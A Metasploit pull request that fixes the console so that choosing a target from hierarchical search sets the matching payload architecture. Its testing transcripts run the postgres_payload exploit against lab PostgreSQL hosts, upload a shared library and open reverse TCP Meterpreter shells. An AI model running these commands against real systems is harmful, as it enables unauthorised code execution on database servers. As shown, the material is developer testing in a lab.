### PR TITLE
Fix using module from hierarchical search not setting target payload

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
@@ -893,6 +893,9 @@ module Msf
             unless additional_datastore_values.nil? || additional_datastore_values.empty?
               mod.datastore.update(additional_datastore_values)
               print_status("Additionally setting #{additional_datastore_values.map { |k,v| "#{k} => #{v}" }.join(", ")}")
+              if additional_datastore_values['TARGET'] && (mod.exploit? || mod.evasion?)
+                mod.import_target_defaults
+              end
             end
 
             # Choose a default payload when the module is used, not run


### PR DESCRIPTION
This PR fixes a small issue I came across whereby searching for a payload with the hierarchical search, then using a target, the target wasn't being set correctly. This could cause issues where trying to run e.g. `postgres_payload` vs. an x64 target such as PostgreSQL 16 running in Docker.

## Before
### Metasploitable2 VM - PostgreSQL 8.3.1
This has worked before as the payload being defaulted to was x86.

<details>

```ruby
msf6 auxiliary(scanner/postgres/postgres_version) > search postgres_payload

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/linux/postgres/postgres_payload    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   1    \_ target: Linux x86                     .                .          .      .
   2    \_ target: Linux x86_64                  .                .          .      .
   3  exploit/windows/postgres/postgres_payload  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   4    \_ target: Windows x86                   .                .          .      .
   5    \_ target: Windows x64                   .                .          .      .


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/postgres/postgres_payload
After interacting with a module you can manually set a TARGET with set TARGET 'Windows x64'

msf6 auxiliary(scanner/postgres/postgres_version) > use 1
[*] Additionally setting TARGET => Linux x86
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > run rhost=192.168.112.178 rport=5432 database=template1 password=postgres username=postgres lhost=192.168.112.1

[*] Started reverse TCP handler on 192.168.112.1:4444
[*] 192.168.112.178:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/aqKDnWWZ.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.112.178
[*] Meterpreter session 1 opened (192.168.112.1:4444 -> 192.168.112.178:46464) at 2024-01-10 17:55:59 +0000

meterpreter > getuid
Server username: postgres
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.112.178 - Meterpreter session 1 closed.  Reason: User exit
```

</details>

### Docker - PostgreSQL 16.1
This did not work previously due to the wrong payload architecture.

<details>

```ruby
msf6 auxiliary(scanner/postgres/postgres_version) > search postgres_payload

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/linux/postgres/postgres_payload    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   1    \_ target: Linux x86                     .                .          .      .
   2    \_ target: Linux x86_64                  .                .          .      .
   3  exploit/windows/postgres/postgres_payload  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   4    \_ target: Windows x86                   .                .          .      .
   5    \_ target: Windows x64                   .                .          .      .


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/postgres/postgres_payload
After interacting with a module you can manually set a TARGET with set TARGET 'Windows x64'

msf6 auxiliary(scanner/postgres/postgres_version) > use 2
[*] Additionally setting TARGET => Linux x86_64
[*] Using configured payload linux/x86/meterpreter/reverse_tcp **<-- WRONG **
msf6 exploit(linux/postgres/postgres_payload) > run rhost=127.0.0.1 rport=5432 password=password username=postgres database=template1

[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(linux/postgres/postgres_payload) > run rhost=127.0.0.1 rport=5432 password=password username=postgres database=template1 lhost=192.168.112.1

[*] Started reverse TCP handler on 192.168.112.1:4444
[*] 127.0.0.1:5432 - PostgreSQL 16.1 (Debian 16.1-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
[*] Uploaded as /tmp/iRxXOMgJ.so, should be cleaned up automatically
[*] Exploit completed, but no session was created.
```

</details>

Docker Logs:
```bash
2024-01-10 17:56:56 2024-01-10 17:56:56.654 UTC [1666] ERROR:  incompatible library "/tmp/iRxXOMgJ.so": missing magic block
2024-01-10 17:56:56 2024-01-10 17:56:56.654 UTC [1666] HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
2024-01-10 17:56:56 2024-01-10 17:56:56.654 UTC [1666] STATEMENT:  create or replace function pg_temp.vmmDIgGVDS() returns void as '/tmp/iRxXOMgJ.so','vmmDIgGVDS' language c strict immutable
```

## After
### Metasploitable2 VM

<details>

```ruby
msf6 auxiliary(scanner/postgres/postgres_version) > search postgres_payload

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/linux/postgres/postgres_payload    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   1    \_ target: Linux x86                     .                .          .      .
   2    \_ target: Linux x86_64                  .                .          .      .
   3  exploit/windows/postgres/postgres_payload  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   4    \_ target: Windows x86                   .                .          .      .
   5    \_ target: Windows x64                   .                .          .      .


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/postgres/postgres_payload
After interacting with a module you can manually set a TARGET with set TARGET 'Windows x64'

msf6 auxiliary(scanner/postgres/postgres_version) > use 1
[*] Additionally setting TARGET => Linux x86
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > run rhost=192.168.112.178 rport=5432 database=template1 password=postgres username=postgres lhost=192.168.112.1

[*] Started reverse TCP handler on 192.168.112.1:4444
[*] 192.168.112.178:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/qwHtdKmS.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.112.178
[*] Meterpreter session 1 opened (192.168.112.1:4444 -> 192.168.112.178:37186) at 2024-01-10 18:00:43 +0000

meterpreter > getuid
Server username: postgres
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.112.178 - Meterpreter session 1 closed.  Reason: User exit
```

</details>

### Docker

<details>

```ruby
msf6 auxiliary(scanner/postgres/postgres_version) > search postgres_payload

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/linux/postgres/postgres_payload    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   1    \_ target: Linux x86                     .                .          .      .
   2    \_ target: Linux x86_64                  .                .          .      .
   3  exploit/windows/postgres/postgres_payload  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   4    \_ target: Windows x86                   .                .          .      .
   5    \_ target: Windows x64                   .                .          .      .


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/postgres/postgres_payload
After interacting with a module you can manually set a TARGET with set TARGET 'Windows x64'

msf6 auxiliary(scanner/postgres/postgres_version) > use 2
[*] Additionally setting TARGET => Linux x86_64
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > run rhost=127.0.0.1 rport=5432 password=password username=postgres database=template1 lhost=192.168.112.1

[*] Started reverse TCP handler on 192.168.112.1:4444
[*] 127.0.0.1:5432 - PostgreSQL 16.1 (Debian 16.1-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
[*] Uploaded as /tmp/qDjAkGcJ.so, should be cleaned up automatically
[*] Sending stage (3045380 bytes) to 192.168.112.1
[*] Meterpreter session 2 opened (192.168.112.1:4444 -> 192.168.112.1:58389) at 2024-01-10 18:01:15 +0000

meterpreter > getuid
Server username: postgres
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 12.1 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died
```

</details>

Docker Logs with `MeterpreterDebugBuild` as `true`:
```
2024-01-10 18:01:15 2024-01-10 18:01:15.320 UTC [1676] ERROR:  incompatible library "/tmp/qDjAkGcJ.so": missing magic block
2024-01-10 18:01:15 2024-01-10 18:01:15.320 UTC [1676] HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
2024-01-10 18:01:15 2024-01-10 18:01:15.320 UTC [1676] STATEMENT:  create or replace function pg_temp.HjbFWJUfRH() returns void as '/tmp/qDjAkGcJ.so','HjbFWJUfRH' language c strict immutable
2024-01-10 18:01:15 [01-10-2024 18:01:15.376s] [tlv.c:498] Registering command 10, cb 0x7feff8ed0b6a, arg 0x55594c226040
2024-01-10 18:01:15 [01-10-2024 18:01:15.376s] [tlv.c:498] Registering command 13, cb 0x7feff8ed0b1d, arg 0x55594c226040
2024-01-10 18:01:15 [01-10-2024 18:01:15.376s] [tlv.c:498] Registering command 22, cb 0x7feff8ed0ac1, arg 0x55594c226040
2024-01-10 18:01:15 [01-10-2024 18:01:15.376s] [tlv.c:498] Registering command 11, cb 0x7feff8ed0a82, arg 0x55594c226040
...
```

Related PR/info:
https://github.com/rapid7/metasploit-framework/issues/15557 - highlights that the lack of the magic constant/block triggers an error log, but the exploit continues to work.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `search postgres_payload`
- [ ] use and run the x86 payload, confirm x86 is chosen
- [ ] `search postgres_payload`
- [ ] use and run the x86_64 64bit payload, confirm x64 is chosen
- [ ] ensure the module completes against both archs as expected